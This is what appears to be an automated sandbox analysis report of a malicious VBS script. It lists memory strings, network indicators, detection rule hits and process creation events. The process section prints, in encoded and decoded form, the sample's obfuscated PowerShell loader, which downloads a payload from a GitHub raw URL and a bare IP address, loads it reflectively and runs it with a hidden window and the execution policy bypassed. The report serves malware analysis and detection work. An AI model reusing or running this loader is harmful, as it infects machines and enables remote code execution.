Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: autopatia.vbs.4.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: autopatia.vbs.4.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://72.5.43.53
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83A08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://72.5.43.53(
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://72.5.43.53/450/RRCFG.txt
Source: powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94DCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94D87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2171869287.0000022A844FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A848D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe;
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: WW8kzvnphl.vbs Initial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.winVBS@11/7@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvp2ytn3.kpy.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: WW8kzvnphl.vbs ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
